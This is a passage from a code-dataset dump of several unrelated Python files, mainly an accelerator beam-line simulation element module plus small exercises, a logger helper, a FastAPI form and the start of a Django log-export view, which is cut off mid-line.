_write_Elegant(self):\n self.update_field_definition()\n wholestring=''\n etype = self._convertType_Elegant(self.objecttype)\n if (not hasattr(self, 'longitudinal_wakefield_sdds') or self.longitudinal_wakefield_sdds == None) and (not hasattr(self, 'transverse_wakefield_sdds') or self.transverse_wakefield_sdds == None):\n # print('cavity ', self.objectname, ' is an RFCA!')\n etype = 'rfca'\n string = self.objectname+': '+ etype\n for key, value in list(merge_two_dicts(self.objectproperties, self.objectdefaults).items()):\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n if self.objecttype == 'cavity':\n # In ELEGANT all phases are +90degrees!!\n value = 90 - value if key.lower() == 'phase' else value\n # If using rftmez0 or similar\n # value = ((90+value)/360.0)*(2*3.14159) if key.lower() == 'phase' else value\n # In ELEGANT the voltages need to be compensated\n value = (self.cells+4.7) * self.cell_length * (1 / np.sqrt(2)) * value if key.lower() == 'volt' else value\n # If using rftmez0 or similar\n value = 1/(2**0.5) * value if key.lower() == 'ez' else value\n # In CAVITY NKICK = n_cells\n value = 3*self.cells if key.lower() == 'n_kicks' else value\n if key.lower() == 'n_bins' and value > 0:\n print('WARNING: Cavity n_bins is not zero - check log file to ensure correct behaviour!')\n value = 1 if value is True else value\n value = 0 if value is False else value\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n return wholestring\n\n def write_GPT(self, Brho, ccs=\"wcs\", *args, **kwargs):\n self.update_field_definition()\n relpos, relrot = ccs.relative_position(self.start, self.global_rotation)\n relpos = relpos + [0, 0, 0]\n coord = self.gpt_coordinates(relpos, relrot)\n '''\n map1D_TM(\"wcs\",\"z\",linacposition,\"mockup2m.gdf\",\"Z\",\"Ez\",ffacl,phil,w);\n '''\n if self.gpt_phase_offset is None:\n self.gpt_phase_offset = 0\n output = 'f = ' + str(self.frequency) +';\\n' + \\\n 'w = 2*pi*f;\\n' + \\\n 'phi = ' + str(self.gpt_phase_offset + self.phase) + '/deg;\\n' + \\\n 'ffac = ' + str(self.field_amplitude)+';\\n' + \\\n 'map1D_TM' + '( ' + ccs.name + ', \"z\", '+ str(relpos[2]) +', \\\"'+str(expand_substitution(self,self.field_definition_gdf).strip('\\'\"')).replace('\\\\','/')+'\", \"Z\",\"Ez\", ffac, phi, w);\\n'\n return output\n\nclass rf_deflecting_cavity(cavity):\n\n def __init__(self, name=None, type='rf_deflecting_cavity', **kwargs):\n super(rf_deflecting_cavity, self).__init__(name, type, **kwargs)\n self.add_default('n_kicks', 10)\n\nclass solenoid(frameworkElement):\n\n def __init__(self, name=None, type='solenoid', **kwargs):\n super(solenoid, self).__init__(name, type, **kwargs)\n\n def write_ASTRA(self, n):\n return self._write_ASTRA(OrderedDict([\n ['S_pos', {'value': self.start[2] + self.dz, 'default': 0}],\n ['FILE_BFieLD', {'value': (''+expand_substitution(self, '\\''+self.field_definition+'\\'')+'').replace('\\\\','/')}],\n ['MaxB', {'value': self.field_amplitude, 'default': 0}],\n ['S_smooth', {'value': self.smooth, 'default': 10}],\n ['S_xoff', {'value': self.start[0] + self.dx, 'default': 0}],\n ['S_yoff', {'value': self.start[1] + self.dy, 'default': 0}],\n ['S_xrot', {'value': self.y_rot + self.dy_rot, 'default': 0}],\n ['S_yrot', {'value': self.x_rot + self.dx_rot, 'default': 0}],\n ]), n)\n\n def write_GPT(self, Brho, ccs=\"wcs\", *args, **kwargs):\n relpos, relrot = ccs.relative_position(self.start, self.global_rotation)\n relpos = relpos + [0, 0, 0]\n coord = self.gpt_coordinates(relpos, relrot)\n '''\n map1D_B(\"wcs\",xOffset,0,zOffset+0.,cos(angle),0,-sin(angle),0,1,0,\"bas_sol_norm.gdf\",\"Z\",\"Bz\",gunSolField);\n '''\n if self.gpt_phase_offset is None:\n self.gpt_phase_offset = 0\n output = 'map1D_B' + '( ' + ccs.name + ', \"z\", '+ str(relpos[2]) + \\\n ', \\\"'+str(expand_substitution(self, self.field_definition_gdf).strip('\\'\"')).replace('\\\\','/') + \\\n '\", \"Z\",\"Bz\", '+ str(self.field_amplitude) + ');\\n'\n return output\n\nclass aperture(frameworkElement):\n\n def __init__(self, name=None, type='aperture', **kwargs):\n super(aperture, self).__init__(name, type, **kwargs)\n self.number_of_elements = 1\n\n def write_GPT(self, Brho, ccs=\"wcs\", *args, **kwargs):\n return ''\n # if self.shape == 'elliptical':\n # output = 'rmax'\n # else:\n # output = 'xymax'\n # output += '( \"wcs\", '+self.gpt_coordinates()+', '+str(self.horizontal_size)+', '+str(self.length)+');\\n'\n # return output\n\n def write_ASTRA_Common(self, dic):\n dic['Ap_Z1'] = {'value': self.start[2] + self.dz, 'default': 0}\n end = self.end[2] + self.dz if self.end[2] > self.start[2] else self.start[2] + self.dz + 1e-3\n dic['Ap_Z2'] = {'value': end, 'default': 0}\n dic['A_xrot'] = {'value': self.y_rot + self.dy_rot, 'default': 0}\n dic['A_yrot'] = {'value': self.x_rot + self.dx_rot, 'default': 0}\n dic['A_zrot'] = {'value': self.z_rot + self.dz_rot, 'default': 0}\n return dic\n\n def write_ASTRA_Circular(self, n):\n dic = OrderedDict()\n dic['File_Aperture'] = {'value': 'RAD'}\n if self.radius is not None:\n radius = self.radius\n elif self.horizontal_size > 0 and self.vertical_size > 0:\n radius = min([self.horizontal_size, self.vertical_size])\n elif self.horizontal_size > 0:\n radius = self.horizontal_size\n elif self.vertical_size > 0:\n radius = self.vertical_size\n else:\n radius = 1\n dic['Ap_R'] = {'value': 1e3*radius}\n return self.write_ASTRA_Common(dic)\n\n def write_ASTRA_Planar(self, n, plane, width):\n dic = OrderedDict()\n dic['File_Aperture'] = {'value': plane}\n dic['Ap_R'] = {'value': width}\n return self.write_ASTRA_Common(dic)\n\n def write_ASTRA(self, n):\n self.number_of_elements = 1\n if self.shape == 'elliptical' or self.shape == 'circular':\n dic = self.write_ASTRA_Circular(n)\n return self._write_ASTRA(dic, n)\n elif self.shape == 'planar' or self.shape == 'rectangular':\n text = ''\n if self.horizontal_size > 0:\n dic = self.write_ASTRA_Planar(n, 'Col_X', 1e3*self.horizontal_size)\n text += self._write_ASTRA(dic, n)\n n = n + 1\n self.number_of_elements = self.number_of_elements + 1\n if self.vertical_size > 0:\n dic = self.write_ASTRA_Planar(n, 'Col_Y', 1e3*self.vertical_size)\n if self.number_of_elements > 1:\n text += '\\n'\n text += self._write_ASTRA(dic, n)\n return text\n\nclass scatter(frameworkElement):\n\n def __init__(self, name=None, type='scatter', **kwargs):\n super(scatter, self).__init__(name, type, **kwargs)\n # print('Scatter object ', self.objectname,' - DP = ', self.objectproperties)\n\n def _write_Elegant(self):\n wholestring=''\n etype = 'scatter'\n string = self.objectname+': '+ etype\n k1 = self.k1 if self.k1 is not None else 0\n for key, value in list(merge_two_dicts({'k1': k1}, merge_two_dicts(self.objectproperties, self.objectdefaults)).items()):\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n return wholestring\n\nclass cleaner(frameworkElement):\n\n def __init__(self, name=None, type='scatter', **kwargs):\n super(cleaner, self).__init__(name, type, **kwargs)\n # print('Scatter object ', self.objectname,' - DP = ', self.objectproperties)\n\n def _write_Elegant(self):\n wholestring=''\n etype = 'clean'\n string = self.objectname+': '+ etype\n for key, value in merge_two_dicts(self.objectproperties, self.objectdefaults).items():\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n return wholestring\n\nclass wall_current_monitor(frameworkElement):\n\n def __init__(self, name=None, type='wall_current_monitor', **kwargs):\n super(wall_current_monitor, self).__init__(name, type, **kwargs)\n\nclass integrated_current_transformer(wall_current_monitor):\n\n def __init__(self, name=None, type='integrated_current_transformer', **kwargs):\n super(integrated_current_transformer, self).__init__(name, type, **kwargs)\n\nclass screen(frameworkElement):\n\n def __init__(self, name=None, type='screen', **kwargs):\n super(screen, self).__init__(name, type, **kwargs)\n if 'output_filename' not in kwargs:\n self.output_filename = str(self.objectname)+'.sdds'\n\n def write_ASTRA(self, n):\n return self._write_ASTRA(OrderedDict([\n ['Screen', {'value': self.middle[2], 'default': 0}],\n ['Scr_xrot', {'value': self.y_rot + self.dy_rot, 'default': 0}],\n ['Scr_yrot', {'value': self.x_rot + self.dx_rot, 'default': 0}],\n ]), n)\n\n def _write_Elegant(self):\n wholestring=''\n etype = self._convertType_Elegant(self.objecttype)\n string = self.objectname+': '+ etype\n # if self.length > 0:\n # d = drift(self.objectname+'-drift-01', type='drift', **{'length': self.length/2})\n # wholestring+=d._write_Elegant()\n for key, value in list(merge_two_dicts(self.objectproperties, self.objectdefaults).items()):\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n # if self.length > 0:\n # d = drift(self.objectname+'-drift-02', type='drift', **{'length': self.length/2})\n # wholestring+=d._write_Elegant()\n return wholestring\n\n def write_CSRTrack(self, n):\n z = self.middle[2]\n return \"\"\"quadrupole{\\nposition{rho=\"\"\"+str(z)+\"\"\", psi=0.0, marker=screen\"\"\"+str(n)+\"\"\"a}\\nproperties{strength=0.0, alpha=0, horizontal_offset=0,vertical_offset=0}\\nposition{rho=\"\"\"+str(z+1e-6)+\"\"\", psi=0.0, marker=screen\"\"\"+str(n)+\"\"\"b}\\n}\\n\"\"\"\n\n def write_GPT(self, Brho, ccs=\"wcs\", *args, **kwargs):\n relpos, relrot = ccs.relative_position(self.position_start, self.global_rotation)\n relpos = relpos + [0, 0, self.length/2.]\n coord = self.gpt_coordinates(relpos, relrot)\n self.gpt_screen_position = relpos[2]\n output = 'screen( ' + ccs.name + ', \"I\", '+ str(relpos[2]) +');\\n'\n return output\n\n def astra_to_hdf5(self, lattice):\n master_run_no = self.global_parameters['run_no'] if 'run_no' in self.global_parameters else 1\n astrabeamfilename = None\n for i in [0, -0.001, 0.001]:\n tempfilename = lattice + '.' + str(int(round((self.middle[2]+i-self.zstart[2])*100))).zfill(4) + '.' + str(master_run_no).zfill(3)\n if os.path.isfile(self.global_parameters['master_subdir'] + '/' + tempfilename):\n astrabeamfilename = tempfilename\n if astrabeamfilename is None:\n print(( 'Screen Error: ', lattice, self.middle[2], self.zstart[2]))\n else:\n self.global_parameters['beam'].read_astra_beam_file((self.global_parameters['master_subdir'] + '/' + astrabeamfilename).strip('\\\"'), normaliseZ=False)\n self.global_parameters['beam'].rotate_beamXZ(-1*self.starting_rotation, preOffset=[0,0,0], postOffset=-1*np.array(self.starting_offset))\n HDF5filename = (self.objectname+'.hdf5').strip('\\\"')\n self.global_parameters['beam'].write_HDF5_beam_file(self.global_parameters['master_subdir'] + '/' + HDF5filename, centered=False, sourcefilename=astrabeamfilename, pos=self.middle)\n\n def sdds_to_hdf5(self):\n elegantbeamfilename = self.output_filename.replace('.sdds','.SDDS').strip('\\\"')\n self.global_parameters['beam'].read_SDDS_beam_file(self.global_parameters['master_subdir'] + '/' + elegantbeamfilename)\n HDF5filename = self.output_filename.replace('.sdds','.hdf5').replace('.SDDS','.hdf5').strip('\\\"')\n self.global_parameters['beam'].write_HDF5_beam_file(self.global_parameters['master_subdir'] + '/' + HDF5filename, centered=False, sourcefilename=elegantbeamfilename, pos=self.middle, zoffset=self.end)\n\n def gdf_to_hdf5(self, gptbeamfilename):\n # gptbeamfilename = self.objectname + '.' + str(int(round((self.allElementObjects[self.end].position_end[2])*100))).zfill(4) + '.' + str(master_run_no).zfill(3)\n try:\n # print('Converting screen', self.objectname,'at', self.gpt_screen_position)\n self.global_parameters['beam'].read_gdf_beam_file(self.global_parameters['master_subdir'] + '/' + gptbeamfilename, position=self.gpt_screen_position)\n HDF5filename = self.objectname+'.hdf5'\n self.global_parameters['beam'].write_HDF5_beam_file(self.global_parameters['master_subdir'] + '/' + HDF5filename, centered=False, sourcefilename=gptbeamfilename)\n except:\n print('Error with screen', self.objectname,'at', self.gpt_screen_position)\n\nclass monitor(screen):\n\n def __init__(self, name=None, type='monitor', **kwargs):\n super(monitor, self).__init__(name, type, **kwargs)\n\nclass watch_point(screen):\n\n def __init__(self, name=None, type='watch_point', **kwargs):\n super(watch_point, self).__init__(name, 'screen', **kwargs)\n\nclass beam_position_monitor(screen):\n\n def __init__(self, name=None, type='beam_position_monitor', **kwargs):\n super(beam_position_monitor, self).__init__(name, type, **kwargs)\n\n def write_ASTRA(self, n):\n return self._write_ASTRA(OrderedDict([\n ['Screen', {'value': self.middle[2], 'default': 0}],\n ['Scr_xrot', {'value': self.y_rot + self.dy_rot, 'default': 0}],\n ['Scr_yrot', {'value': self.x_rot + self.dx_rot, 'default': 0}],\n ]), n)\n\nclass beam_arrival_monitor(screen):\n\n def __init__(self, name=None, type='beam_arrival_monitor', **kwargs):\n super(beam_arrival_monitor, self).__init__(name, type, **kwargs)\n\n def write_ASTRA(self, n):\n return ''\n\nclass collimator(aperture):\n\n def __init__(self, name=None, type='collimator', **kwargs):\n super(collimator, self).__init__(name, type, **kwargs)\n\nclass marker(screen):\n\n def __init__(self, name=None, type='marker', **kwargs):\n super(marker, self).__init__(name, 'screen', **kwargs)\n\n def write_CSRTrack(self, n):\n return ''\n\nclass drift(frameworkElement):\n\n def __init__(self, name=None, type='drift', **kwargs):\n super(drift, self).__init__(name, type, **kwargs)\n\n # def _write_Elegant(self):\n # wholestring=''\n # etype = self._convertType_Elegant(self.objecttype)\n # string = self.objectname+': '+ etype\n # for key, value in list(merge_two_dicts(self.objectproperties, self.objectdefaults).items()):\n # if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n # value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n # key = self._convertKeword_Elegant(key)\n # value = 1 if value is True else value\n # value = 0 if value is False else value\n # tmpstring = ', '+key+' = '+str(value)\n # if len(string+tmpstring) > 76:\n # wholestring+=string+',&\\n'\n # string=''\n # string+=tmpstring[2::]\n # else:\n # string+= tmpstring\n # wholestring+=string+';\\n'\n # return wholestring\n\nclass csrdrift(frameworkElement):\n\n def __init__(self, name=None, type='csrdrift', **kwargs):\n super(csrdrift, self).__init__(name, type, **kwargs)\n self.add_default('lsc_interpolate', 1)\n\n def _write_Elegant(self):\n wholestring=''\n etype = self._convertType_Elegant(self.objecttype)\n string = self.objectname+': '+ etype\n for key, value in list(merge_two_dicts(self.objectproperties, self.objectdefaults).items()):\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n value = 1 if value is True else value\n value = 0 if value is False else value\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n return wholestring\n\nclass lscdrift(frameworkElement):\n\n def __init__(self, name=None, type='lscdrift', **kwargs):\n super(lscdrift, self).__init__(name, type, **kwargs)\n\n def _write_Elegant(self):\n wholestring=''\n etype = self._convertType_Elegant(self.objecttype)\n string = self.objectname+': '+ etype\n for key, value in list(merge_two_dicts(self.objectproperties, self.objectdefaults).items()):\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n value = 1 if value is True else value\n value = 0 if value is False else value\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n return wholestring\n\nclass shutter(csrdrift):\n\n def __init__(self, name=None, type='shutter', **kwargs):\n super(shutter, self).__init__(name, type, **kwargs)\n\nclass valve(csrdrift):\n\n def __init__(self, name=None, type='valve', **kwargs):\n super(valve, self).__init__(name, type, **kwargs)\n\nclass bellows(csrdrift):\n\n def __init__(self, name=None, type='bellows', **kwargs):\n super(bellows, self).__init__(name, type, **kwargs)\n\nclass fel_modulator(frameworkElement):\n\n def __init__(self, name=None, type='modulator', **kwargs):\n super(fel_modulator, self).__init__(name, type, **kwargs)\n self.add_default('k1l', 0)\n self.add_default('n_steps', 1*self.periods)\n\n def write_ASTRA(self, n):\n return self._write_ASTRA(OrderedDict([\n ['Q_pos', {'value': self.middle[2] + self.dz, 'default': 0}],\n ]), n)\n\n def _write_Elegant(self):\n wholestring=''\n etype = self._convertType_Elegant(self.objecttype)\n string = self.objectname+': '+ etype\n for key, value in list(merge_two_dicts(self.objectproperties, self.objectdefaults).items()):\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n return wholestring\n\nclass wiggler(frameworkElement):\n\n def __init__(self, name=None, type='wiggler', **kwargs):\n super(wiggler, self).__init__(name, type, **kwargs)\n # self.add_default('k1l', 0)\n # self.add_default('n_steps', 1*self.periods)\n\n def write_ASTRA(self, n):\n return self._write_ASTRA(OrderedDict([\n ['Q_pos', {'value': self.middle[2] + self.dz, 'default': 0}],\n ]), n)\n\n def _write_Elegant(self):\n wholestring=''\n if ('k' in self and abs(self.k) > 0) or ('peak_field' in self and abs(self.peak_field) > 0) or ('radius' in self and abs(self.radius) > 0):\n etype = self._convertType_Elegant(self.objecttype)\n else:\n etype = 'drift'\n string = self.objectname+': '+ etype\n for key, value in list(merge_two_dicts(self.objectproperties, self.objectdefaults).items()):\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n return wholestring\n\nclass charge(frameworkElement):\n def __init__(self, name=None, type='charge', **kwargs):\n super(charge, self).__init__(name, 'charge', **kwargs)\n\nclass global_error(frameworkElement):\n\n def __init__(self, name=None, type='global_error', **kwargs):\n super(global_error, self).__init__(name, 'global_error', **kwargs)\n # self._errordict = {}\n\n def add_Error(self, type, sigma):\n if type in global_Error_Types:\n self.add_property(type, sigma)\n\n def write_ASTRA(self):\n return self._write_ASTRA(OrderedDict([[key, {'value': value}] for key, value in self._errordict]))\n\n def write_GPT(self, Brho, ccs=\"wcs\", *args, **kwargs):\n relpos, relrot = ccs.relative_position(self.middle, [0,0,0])\n coord = self.gpt_coordinates(relpos, relrot)\n output = str(self.objecttype) + '( '+ ccs.name +', '+ coord +', '+str(self.length)+', '+str(Brho*self.k1)+');\\n'\n return output\n\nclass longitudinal_wakefield(cavity):\n\n def __init__(self, name=None, type='longitudinal_wakefield', **kwargs):\n super(longitudinal_wakefield, self).__init__(name, type, **kwargs)\n self.add_default('coupling_cell_length', 0)\n\n def write_ASTRA(self, startn):\n self.update_field_definition()\n current_bins = self.current_bins if self.current_bins > 0 else 11\n output = ''\n if self.scale_kick > 0:\n for n in range(startn, startn+self.cells):\n output += self._write_ASTRA(OrderedDict([\n ['Wk_Type', {'value': self.waketype, 'default': '\\'Taylor_Method_F\\''}],\n ['Wk_filename', {'value': ('\\''+expand_substitution(self, '\\''+self.field_definition+'\\'').strip('\\'\"')+'\\'').replace('\\\\','/'), 'default': 0}],\n ['Wk_x', {'value': self.x_offset, 'default': 0}],\n ['Wk_y', {'value': self.y_offset, 'default': 0}],\n ['Wk_z', {'value': self.start[2] + self.coupling_cell_length + (n-1)*self.cell_length}],\n ['Wk_ex', {'value': self.scale_field_ex, 'default': 0}],\n ['Wk_ey', {'value': self.scale_field_ey, 'default': 0}],\n ['Wk_ez', {'value': self.scale_field_ez, 'default': 1}],\n ['Wk_hx', {'value': self.scale_field_hx, 'default': 1}],\n ['Wk_hy', {'value': self.scale_field_hy, 'default': 0}],\n ['Wk_hz', {'value': self.scale_field_hz, 'default': 0}],\n ['Wk_equi_grid', {'value': self.equal_grid, 'default': 0}],\n ['Wk_N_bin', {'value': current_bins, 'default': 11}],\n ['Wk_ip_method', {'value': self.interpolation_method, 'default': 2}],\n ['Wk_smooth', {'value': self.smooth, 'default': 0.5}],\n ['Wk_sub', {'value': self.subbins, 'default': 4}],\n ['Wk_scaling', {'value': self.scale_kick, 'default': 1}],\n ]), n)\n output += '\\n'\n return output\n\n def _write_Elegant(self):\n self.update_field_definition()\n wholestring=''\n etype = self._convertType_Elegant(self.objecttype)\n string = self.objectname+': '+ etype\n if self.length > 0:\n d = drift(self.objectname+'-drift', type='drift', **{'length': self.length})\n wholestring+=d._write_Elegant()\n for key, value in list(merge_two_dicts(self.objectproperties, self.objectdefaults).items()):\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n return wholestring\n\nclass gpt_ccs(Munch):\n\n def __init__(self, name, position, rotation, intersect=0):\n super(gpt_ccs, self).__init__()\n self._name = name\n self.intersect = intersect\n self.x, self.y, self.z = position\n self.psi, self.phi, self.theta = rotation\n\n def relative_position(self, position, rotation):\n x, y, z = position\n psi, phi, theta = rotation\n # print(self.name, [x - self.x, y - self.y, z - self.z])\n # print(self.name, [psi - self.psi, phi - self.phi, theta - self.theta])\n newpos = [x - self.x, y - self.y, z - self.z]\n # print('newpos = ', self.name, x, self.x, y, self.y, z, self.z)\n finalrot = [psi - self.psi, phi - self.phi, theta - self.theta]\n finalpos = np.array([0,0,self.intersect]) + np.dot(np.array(newpos), _rotation_matrix(-self.theta))\n return finalpos, finalrot\n\n @property\n def name(self):\n return '\"' + self._name + '\"'\n @property\n def position(self):\n return self.x, self.y, self.z\n @property\n def rotation(self):\n return self.psi, self.phi, self.theta\n","repo_name":"VELA-CLARA-software/SimFramed","sub_path":"SimulationFramework/Framework_elements.py","file_name":"Framework_elements.py","file_ext":"py","file_size_in_byte":48721,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71521156007","text":"class student:\r\n def setname(self,name):#using mutator method\r\n self.name=name\r\n def getname(self):#using accessor methods\r\n return self.name\r\n def setmarks(self,marks):#using mutator methods\r\n self.marks=marks\r\n def getmarks(self):#using accessor methods\r\n return self.marks\r\n#creating class instance\r\nn=int(input(\"Enter no. of students:\"))\r\ni=1\r\nwhile(i<=n):\r\n s=student()\r\n #Giving data to the class\r\n name=input(\"Enter name :\")\r\n s.setname(name)\r\n marks=int(input(\"Enter marks :\"))\r\n s.setmarks(marks)\r\n #Retriving data from the class\r\n print(\"Hi! \",s.getname()+\" you got \"+str(s.getmarks())+\" out of 700 marks\")\r\n i+=1\r\n print(\"-----------------------------------------------------------------------------------\")\r\n \r\n","repo_name":"MaesterPycoder/Python_Programming_Language","sub_path":"code list2/prapro012.py","file_name":"prapro012.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16553868643","text":"import logging\n\n\ndef setup_logger(log_file, level=logging.INFO):\n # Create a logger if it doesn't exist already\n logger = logging.getLogger()\n if len(logger.handlers) > 0:\n # Handlers already exist, return the existing logger\n return logger\n\n logger.setLevel(level)\n\n file_handler = logging.FileHandler(log_file)\n file_handler.setLevel(level)\n\n stream_handler = logging.StreamHandler()\n stream_handler.setLevel(level)\n\n formatter = logging.Formatter(\"%(asctime)s - %(levelname)s - %(message)s\")\n file_handler.setFormatter(formatter)\n stream_handler.setFormatter(formatter)\n\n logger.addHandler(file_handler)\n logger.addHandler(stream_handler)\n\n return logger\n","repo_name":"neelabalan/concurrency_from_ground_up","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17454876008","text":"#공부한 블로그 https://velog.io/@jajubal/%ED%8C%8C%EC%9D%B4%EC%8D%AC%EB%B0%B1%EC%A4%80-12907-%EB%8F%99%EB%AC%BC%EC%9B%90\nN = int(input())\narr = list(map(int, input().split()))\n\ntotal = [0] * 41 #[0,0,0,0,0,0,0,0...]\nex_total = 2\n\nfor a in arr:\n total[a] += 1 #[2,2,1,0,0,0,0,0,...] 나보다 큰 애들은 인덱스 만큼 있어 , 각 인덱스에 저장된 값은 그렇게 대답한 동물 수\n\ntmp = True\nfor cnt in total: #조건탐색\n if cnt > ex_total: # 인덱스가 뒤로 갈 수록 현재 인덱스에 저장된 값 보다 작아져야함 \n tmp = False\n break\n ex_total = cnt\n\nif tmp:\n print(2 ** (total.count(2) + (1 if 1 in total else 0)))\nelse:\n print(0)\n","repo_name":"apple3285/Programing_training","sub_path":"백준_문자열(nomal)문제모음/12907_동물원.py","file_name":"12907_동물원.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3632658025","text":"# TEE RATKAISUSI TÄHÄN:\nclass Alkio:\n \"\"\" Luokka mallintaa yhtä alkiota binääripuussa \"\"\"\n def __init__(self, arvo, vasen_lapsi:'Alkio' = None, oikea_lapsi:'Alkio' = None):\n self.arvo = arvo\n self.vasen_lapsi = vasen_lapsi\n self.oikea_lapsi = oikea_lapsi\n\ndef suurin_alkio(juuri: Alkio):\n summa = juuri.arvo\n if juuri.vasen_lapsi is not None:\n summa = max(summa, suurin_alkio(juuri.vasen_lapsi))\n\n if juuri.oikea_lapsi is not None:\n summa = max(summa, suurin_alkio(juuri.oikea_lapsi))\n\n return summa","repo_name":"sami-one/mooc-ohjelmointi-21","sub_path":"osa11-16_suurin_alkio/src/suurin_alkio.py","file_name":"suurin_alkio.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"fi","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37278895568","text":"from typing import List\nfrom typing import Optional\n\nfrom fastapi import Request\n\n\nclass JobCreateForm:\n def __init__(self, request: Request):\n self.request: Request = request\n self.errors: List = []\n self.name: Optional[str] = None\n self.adhar: Optional[str] = None\n self.pen: Optional[str] = None\n \n\n async def load_data(self):\n form = await self.request.form()\n self.name = form.get(\"name\")\n self.adhar = form.get(\"adhar\")\n \n self.pen = form.get(\"pen\")\n \n\n def is_valid(self):\n if not self.name or not len(self.name) >= 4:\n self.errors.append(\"A valid name is required\")\n if not self.adhar or not len(self.adhar) >= 1:\n self.errors.append(\"A valid Adhar Number is required\")\n if not self.errors:\n return True\n return False\n","repo_name":"Shashi-Chaurasia/ocr_webpp_fastapi","sub_path":"backend/webapps/jobs/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14910708980","text":"from csv import writer\nfrom django.conf import settings\nfrom django.core.exceptions import PermissionDenied\nfrom django.http import HttpResponse\nfrom euniwspace.models import ScannerLog\nimport datetime\nfrom django.shortcuts import render\n\ndef scanners(request, auth, map_id, from_date, format, to_date=None):\n \"\"\"Take logs between requested dates and display in csv\"\"\"\n if settings.EUNI_AUTH != auth or format not in ('csv', 'xml'):\n raise PermissionDenied \n if not to_date:\n to_date = datetime.datetime.combine(datetime.date.today(),\n datetime.time.max)\n else:\n to_date = datetime.datetime.combine(datetime.datetime.strptime(\n to_date, '%Y-%m-%d'), datetime.time.max)\n \n from_date = datetime.datetime.combine(datetime.datetime.strptime(\n from_date, '%Y-%m-%d'), datetime.time.min)\n logs = ScannerLog.objects.filter(time__range=(from_date, to_date))\\\n .filter(map_id=map_id).select_related('user__username',\n 'system__name', 'sig_type__longname')\n \n if format == 'csv':\n response = HttpResponse(mimetype='text/csv')\n csv = writer(response)\n csv.writerow(('Scanner', 'Time', 'System', 'Signature 